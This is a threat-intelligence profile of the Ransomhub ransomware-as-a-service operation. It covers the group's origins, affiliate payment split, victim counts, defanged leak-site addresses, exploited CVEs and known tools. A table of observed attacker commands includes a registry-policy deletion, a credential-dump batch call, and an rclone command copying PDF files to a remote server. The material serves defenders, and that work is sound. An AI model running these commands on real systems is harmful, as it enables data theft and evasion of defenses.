THREAT PROFILE :
Ransomhub Ransomware
Executive Summary
- First Identified: 2024
- Operation style: Ransomware-as-a-Service (RaaS)
- Extortion method: Double extortion – combining the traditional ransomware extortion method (encryption) with exfiltration of victim’s sensitive data; the group threatens to leak the data via a data leak site if the ransom demand is not paid.
- Most frequently targeted industries:
- Industrials (Manufacturing)
- Industrials (Construction & Engineering)
- Consumer Cyclicals (Retail)
- Most frequently targeted victim HQ region: North America
Description
Ransomhub is a ransomware-as-a-service (RaaS) operation that was first identified in February 2024. The group has been assessed to be related to the Alphv ransomware group, likely due to multiple former Alphv affiliates being observed using the Ransomhub ransomware. Additionally, security researchers with Symantec reported that the Ransomhub and Knight ransomware operations share significant overlap of code. The overlap has been assessed to likely be due to the Knight ransomware source code being sold on cybercriminal forums after the Knight operators halted operations.
Ransomhub is written in Golang and C++, according to a dark-web post. The malware is obfuscated using abstract syntax tree (AST) and built daily, with operators taking a 10% commission from affiliates in the RaaS model.
Initial Access Methods
Ransomhub initial access methods likely vary depending on the affiliate deploying the ransomware, including phishing, vulnerability exploitation, and initial access malware.
Payment Model
Ransomhub affiliates are allowed to keep 90% of ransom payments, with the core group taking a 10% commission. Affiliates are prohibited from targeting organizations that have previously paid a ransom demand and non-profit organizations.
Previous Targets
Previous Industry Targets (01 Feb 2024 to 31 Mar 2025)
- Construction & Engineering: 95
- Manufacturing: 101
- Transportation: 19
- Other: 21
Previous Victim HQ Regions (01 Feb 2024 to 31 Mar 2025)
- North America: 439
- South America: 156
- Europe: 87
- Asia: 51
- Africa: 22
- Oceania: 15
Data Leak Site
hxxp://ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd[.onion]
hxxp://fpwwt67hm3mkt6hdavkfyqi42oo3vkaggvjj4kxdr2ivsbzyka5yr2qd[.onion]
hxxp://ransomgxjnwmu5ceqwo2jrjssxpoicolmgismfpnslaixg3pgpe5qcad[.onion]
hxxp://mjmru3yz65o5szsp4rmkmh4adlezcpy5tqjjc4y5z6lozk3nnz2da2ad[.onion]
hxxp://an2ce4pqpf2ipvba2djurxi5pnxxhu3uo7ackul6eafcundqtly7bhid[.onion]
Known Exploited Vulnerabilities
| Vulnerability | Description | Product Affected | CVSS |
|---|---|---|---|
| CVE-2017-0144 | RCE Vulnerability | Microsoft SMBv1 | 8.1 |
| CVE-2020-0787 | Improper Privilege Management Vulnerability | Microsoft Windows Background Intelligent Transfer Service(BITS) | 7.8 |
| CVE-2022-24521 | Privilege Escalation Vulnerability | Windows Log File System Driver | 7.8 |
| CVE-2022-42475 | Heap-Based Buffer Overflow Vulnerability | Fortinet FortiOS | 9.8 |
| CVE-2023-22515 | Broken Access Control Vulnerability | Atlassian Confluence Data Center and Server | 9.8 |
| CVE-2023-27532 | Missing Authentication for Critical Function Vulnerability | Veeam Backup&Replication Cloud Connect | 7.5 |
| CVE-2023-27997 | Heap-Based Overflow Vulnerability | Fortinet FortiOS | 9.8 |
| CVE-2023-3519 | RCE Vulnerability | Citrix NetScaler ADC and NetScaler Gateway | 9.8 |
| CVE-2023-46604 | Deserialization of Untrusted Data Vulnerability | Apache ActiveMQ | 9.8 |
| CVE-2023-46747 | Authentication Bypass Vulnerability | F5 BIG-IP Configuration Utility | 9.8 |
Associations
- Koley: The user profile on RAMP, a cybercriminal forum, that has previously advertised the Ransomhub RaaS operation.
- Notchy: A former Alphv ransomware affiliate working with Ransomhub.
- Alphv Ransomware: The Ransomhub’s encryptor has similarities to the Alphv encryptor.
- DragonForce Ransomware: Mixed reports exist regarding the relationship between Ransomhub and DragonForce, indicating potential merger or exit scam.
Known Tools
| Tool | Description |
|---|---|
| Advanced Port Scanner | Free network scanner to find open ports. |
| Amazon S3 Buckets | Service that offers object storage. |
| Google Voice | VoIP server used for phishing phone calls. |
| Mimikatz | Open-source application used to view and save authentication credentials |
| TightVNC | Remote desktop software allowing access to computers over the network. |
Observed Behaviors
Windows
| Tactic | Commands Observed |
|---|---|
| Defense Evasion | reg delete “HKLM\Software\Microsoft\Windows\CurrentVersion\PColicies” /f |
| Credential Access | C:\Windows\System32\cmd.exe /C C:\Downloads\232.bat \Temp\sass.DMP |
| Discovery | Process32FirstW() API |
| Command and Control | C:\Windows\system32\cmd.exe /c C:\ProgramData\AnyDesk.exe |
| Exfiltration | rclone copy \i$ <REMOTE_SERVER>: \Users --include ".pdf" |
Execution Options
Windows Execution Options
| Execution Option | Description |
|---|---|
-cmd string |
Execute a specific command before encryption. |
-disable-net |
Disable network interfaces before starting encryption. |
-fast |
Enable fast encryption mode. |
References
Agat (2024, April 04) Fortinet: “Threat Coverage: How FortiEDR protects against RansomHub Ransomware.” FortiEDR
Aitoriyev, Abzal; Tykushin, Anatoly (2024, August 28) Group-IB: “Ransomhub ransomware-as-a-service.” Group-IB
Avanzato, Joseph (2025, April 10) Varonis: “RansomHub-What You Need to Know About the Rapidly Emerging Threat.” Varonis
CISA (2024, August 29) “#StopRansomware: RansomHub Ransomware.” CISA
DarkTrace (2025, January 14) “RansomHub Ransomware: Darktrace’s Investigation of the Newest Tool in ShadowSyndicate's Arsenal.” DarkTrace